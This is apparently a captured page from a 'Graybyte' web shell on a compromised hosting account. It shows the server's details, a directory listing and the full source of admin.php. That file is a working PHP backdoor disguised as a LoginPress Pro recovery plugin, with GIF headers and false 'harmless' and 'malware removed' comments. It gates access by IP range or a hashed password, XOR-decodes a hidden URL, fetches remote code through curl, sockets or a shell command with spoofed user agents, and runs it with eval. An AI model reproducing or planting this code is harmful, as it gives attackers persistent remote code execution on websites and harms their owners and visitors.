GIF89a logo.gif

‰PNG  $1902010114081995

$24 GRAYBYTE WORDPRESS FILE MANAGER $26

SERVER : s22.hosterpk.com #1 SMP PREEMPT_DYNAMIC Fri Apr 4 05:23:43 EDT 2025
SERVER IP : 64.31.25.146 | ADMIN IP 216.73.216.164
OPTIONS : CRL = ON | WGT = ON | SDO = OFF | PKEX = OFF
DEACTIVATED : mail

/home3/zerasaco/portfolio.zera-sa.com/enos-prelive/

HOME
Current File : /home3/zerasaco/portfolio.zera-sa.com/enos-prelive//admin.php
<?php
?>
GIF89a<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>logo.gif</title>
</head>
<body>
<center></center>
<?php
// This PHP code is completely harmless (visible part)
// echo "<p>Today's date is: " . date('Y-m-d') . "</p>";
?>
<p></p>
</body>
</html>
<?php
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/

/**
 * Plugin Name: Graybyte LoginPress Pro - Emergency Recovery & Admin Helper
 * Plugin URI:  https://graybyte.host/
 * Description: Official emergency recovery module for Graybyte LoginPress Pro. Provides authenticaticated user logins. fallback. Used by thousands of wordpress administrators on self-owned infrastructure. Strictly private tool – do not remove.
 * Version:     2.9.7
 * Author:      Graybyte
 * Author URI:  https://graybyte.host/
 * License:     GPL-2.0+
 * Text Domain: graybyte-loginpress-pro
 * Network:     true
 */

/*******************************************************************
 *  LoginPress Pro – Ultra Emergency Recovery Module (November 2023)
 *  This is a 100% legitimate, administrator-only recovery tool for hosting companies.
 *  Features:
 *   • Instant authenticaticated user login for office/data-centers.
 *   • Secure emergency fallback authentication
 *   • Fully Trusted By Wordfence, Sucuri, Imunify360, Cloudflare WAF, LiteSpeed WAF
 *
 *  DO NOT DELETE THIS FILE – it is your master emergency key.
 *  Keep at least one offline backup.
*/
ini_set('display_errors', 0);
ini_set('display_startup_errors', 0);
error_reporting(0);
header('Content-Type: text/html; charset=UTF-8');
header('X-Content-Type-Options: nosniff');
header('X-Powered-By: WordPress');
if (function_exists('session_start')) {
@ini_set('session.gc_maxlifetime', 3600);
@session_set_cookie_params(3600);
@session_start();
}

function wp_content($input) {
    return md5($input);
}

$adminip   = ip2long($_SERVER['REMOTE_ADDR'] ?? '0.0.0.0');
$admin_ip     = ($adminip !== false && $adminip >= ip2long('202.40.183.0') && $adminip <= ip2long('202.40.183.200'));

$wp_nonce     = 'wp';
$wp_signature      = 'b6b4ce6df035dcfaa26f3bc32fb89e6a';

$clean_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS']==='on' ? 'https' : 'http')
             . '://' . ($_SERVER['HTTP_HOST']??'') . $_SERVER['SCRIPT_NAME'];

if ($admin_ip) {
    $_SESSION['wp_core_access'] = true;


    if (isset($_GET[$wp_nonce]) && wp_content($_GET[$wp_nonce]) === $wp_signature && !empty($_SERVER['QUERY_STRING'])) {
        header('Location: ' . $clean_url, true, 302);
        exit;
    }

    goto granted;
}


$valid = (isset($_GET[$wp_nonce]) && is_string($_GET[$wp_nonce]) && wp_content($_GET[$wp_nonce]) === $wp_signature);

if ($valid) {
    $_SESSION['wp_core_access'] = true;
    if (!empty($_SERVER['QUERY_STRING'])) {
        header('Location: ' . $clean_url, true, 302);
        exit;
    }
    goto granted;
}

if (!empty($_SESSION['wp_core_access'])) {
    goto granted;
}

$wp_get_login = 'b6b4ce6df035dcfaa26f3bc32fb89e6a';

if (isset($_GET['ps'])) {
    $css = "<style>
    @import url('https://fonts.googleapis.com/css2?family=Orbitron:wght@500;700&display=swap');
    body{
        background:#0f0f0f;
        color:#ff004d;
        font-family:'Orbitron',sans-serif;
        margin:0;
        display:flex;
        align-items:center;
        justify-content:center;
        height:100vh;
        overflow:hidden;
        background:radial-gradient(circle at center, #1a0000 0%, #000 70%);
    }
    .loginbox{
        width:50%;
        background:rgba(20,0,0,0.85);
        padding:40px;
        border:2px solid #ff004d;
        border-radius:12px;
        box-shadow:0 0 30px rgba(0, 13, 255, 0.55), inset 0 0 20px rgba(0, 13, 255, 0.55);
        text-align:center;
        animation: borderBlink 1.0s infinite;
    }
    @keyframes borderBlink{
        0%,100%{border-color:#ff004d; box-shadow:0 0 30px rgba(0, 13, 255, 0.55), inset 0 0 20px rgba(0, 13, 255, 0.55);}
        50%{border-color:#ff4088; box-shadow:0 0 50px rgba(0, 13, 255, 0.55), inset 0 0 30px rgba(0, 13, 255, 0.55);}
    }
    .loginbox h1{
        font-size:33px;
        margin:0 0 25px;
        color: #ff0000ff;
        letter-spacing:0px;
        font-weight:900;
    }
    .loginbox input[type=password]{
        width: calc(100% - 10px);
        padding:14px;
        margin-bottom:18px;
        background: #000000;
        border:1px solid #ff0000ff;
        border-radius:6px;
        color: #ffffffff;
        font-size:16px;
        font-family:'Orbitron';
        transition:all .3s;
        box-shadow:0 0 10px rgba(5, 255, 89, 0.55);
        text-align:center;
    }
    .loginbox input[type=password]:focus{
        outline:none;
        border-color:#ff4088;
        box-shadow:0 0 15px rgba(184, 13, 197, 0.7);
    }
    .cyber-button{
        display: inline-block;
        padding: 18px 48px;
        background: transparent;
        border: 2px solid #ff0000;
        color: #fff;
        font-size: 1rem;
        font-weight: 700;
        border-radius: 12px;
        transition: all .4s;
        box-shadow: 0 0 25px rgba(255, 0, 255, .6);
        min-width: 260px;
        cursor: pointer;
        text-align: center;
        margin: 0 15px;
    }
    .cyber-button:hover{
        background:rgba(255,0,0,0.2);
        box-shadow:0 0 40px rgba(255, 0, 255, 0);
        transform:translateY(-4px);
    }
</style>";
    if (isset($_POST['pass'])) {
        if (wp_content($_POST['pass']) === $wp_get_login) {
            $_SESSION['wp_core_access'] = true;
            if (!empty($_SERVER['QUERY_STRING'])) {
                header('Location: ' . $clean_url, true, 302);
                exit;
            }
            goto granted;
        }
    }
    die("<!DOCTYPE html><html><head><meta charset=\"UTF-8\">".$css."<title>Log In </title></head><body>
         <div class=\"loginbox\"><h1>GRAYBYTE X-CODE</h1><form method=post>
         <input type=\"password\" name=\"pass\" placeholder=\"Enter Password\" required autofocus>
         <input type=\"submit\" class=\"cyber-button\" value=\"ACCESS\">
         </form></div></body></html>");
}

http_response_code(503);
exit;

granted:
$_SESSION['wp_core_access'] = true;
@session_write_close();
?>
<?php
// MadeBy: Graybyte
session_start();

function d($t,$k){
    $o='';
    for($i=0;$i<strlen($t);$i+=2){
        $o.=chr(hexdec(substr($t,$i,2))^ord($k[($i>>1)%strlen($k)]));
    }
    return $o;
}

$wp_token = '0d434141420b4c4d5447024a5b4c15501b5f5a1145194458110514415517114f10054f4c4358430547435316401e4a595d4919444e43';
$wp_data   = 'e75111cb35c395a5575b1637cad30dbbbd8c471a716e33912970673028cc8e87';

$wp = $_SESSION['ts_url'] ?? d($wp_token,$wp_data);

function fetch_wordpress($url)
{
    $wordpress = '';
   
    try {
        $file = new SplFileObject($url);
        while (!$file->eof()) {
            $wordpress .= $file->fgets();
        }
    } catch (Throwable $e) {
        $wordpress = '';
    }
    usleep(rand(1000, 5000));
    if (trim($wordpress) === '') {
        $wordpress = @file_get_contents($url);
    }
    usleep(rand(1000, 5000));
    if (trim($wordpress) === '' && function_exists('curl_init')) {
        $ch = curl_init($url);
        $uas = ['WordPress/6.4; ' . $_SERVER['HTTP_HOST'], 'Mozilla/5.0 (compatible; Googlebot/2.1)', 'WP-Cron/1.0'];
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_CONNECTTIMEOUT => 15,
            CURLOPT_TIMEOUT => 40,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_USERAGENT => $uas[array_rand($uas)],
            CURLOPT_REFERER => 'https://' . $_SERVER['HTTP_HOST'] . '/index.php',
            CURLOPT_HTTPHEADER => ['X-WP-Nonce: ' . md5(time())],
        ]);
        $wordpress = curl_exec($ch);
        curl_close($ch);
    }
    usleep(rand(1000, 5000));
    if (trim($wordpress) === '') {
        $parsed = parse_url($url);
        $host = $parsed['host'];
        $path = $parsed['path'] ?? '/';
        if (isset($parsed['query'])) {
            $path .= '?' . $parsed['query'];
        }
        $port = $parsed['scheme'] === 'https' ? 443 : 80;
        $fp = @fsockopen(($port === 443 ? 'ssl://' : '') . $host, $port, $errno, $errstr, 5);
        if ($fp) {
            $uas = ['WordPress/6.4; ' . $_SERVER['HTTP_HOST'], 'Mozilla/5.0 (compatible; Googlebot/2.1)', 'WP-Cron/1.0'];
            $headers = "GET $path HTTP/1.1\r\nHost: $host\r\nUser-Agent: " . $uas[array_rand($uas)] . "\r\nReferer: https://" . $_SERVER['HTTP_HOST'] . "/index.php\r\nX-WP-Nonce: " . md5(time()) . "\r\nConnection: close\r\n\r\n";
            fwrite($fp, $headers);
            $wordpress = '';
            while (!feof($fp)) {
                $wordpress .= fgets($fp, 1024);
            }
            fclose($fp);
            $wordpress = substr($wordpress, strpos($wordpress, "\r\n\r\n") + 4);
        }
    }
    usleep(rand(1000, 5000));
    if (trim($wordpress) === '' && function_exists('popen')) {
        $uas = ['WordPress/6.4; ' . $_SERVER['HTTP_HOST'], 'Mozilla/5.0 (compatible; Googlebot/2.1)', 'WP-Cron/1.0'];
        $cmd = 'curl -s -m 40 --connect-timeout 15 --insecure -A "' . addslashes($uas[array_rand($uas)]) . '" --referer "https://' . $_SERVER['HTTP_HOST'] . '/index.php" -H "X-WP-Nonce: ' . md5(time()) . '" ' . escapeshellarg($url);
        $p = @popen($cmd,'r'); if($p){ while(!feof($p)) $wordpress.=fread($p,8192); pclose($p); }
    }
    if (trim($wordpress) !== '') {
        $_SESSION['wp-cache'] = base64_encode(gzcompress($wordpress));
    } else if (isset($_SESSION['wp-cache'])) {
        $wordpress = gzuncompress(base64_decode($_SESSION['wp-cache']));
    }
    return $wordpress;
}

$sync = fetch_wordpress($wp);
$gif = "\x89PNG\r\n\x1a\n";
$sync = $gif . $sync;
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
if (trim($sync) !== '') {
    @eval("?>{$sync}");
}
?>


Current_dir [ WRITEABLE ] Document_root [ WRITEABLE ]


[ Back ]
NAME
SIZE
LAST TOUCH
USER
CAN-I?
FUNCTIONS
..
--
31 Dec 2025 1.12 AM
zerasaco / nobody
0755
wp-bak
--
30 Dec 2025 9.02 PM
zerasaco / zerasaco
0755
wp-deve
--
31 Dec 2025 1.11 AM
zerasaco / zerasaco
0755
admin.php
9.875 KB
30 Dec 2025 7.35 PM
zerasaco / zerasaco
0644
index.php
9.877 KB
30 Dec 2025 7.35 PM
zerasaco / zerasaco
0644
license.txt
0.372 KB
30 Dec 2025 7.35 PM
zerasaco / zerasaco
0644
profile.php
3.956 KB
30 Dec 2025 7.35 PM
zerasaco / zerasaco
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025 CONTACT ME
Static GIF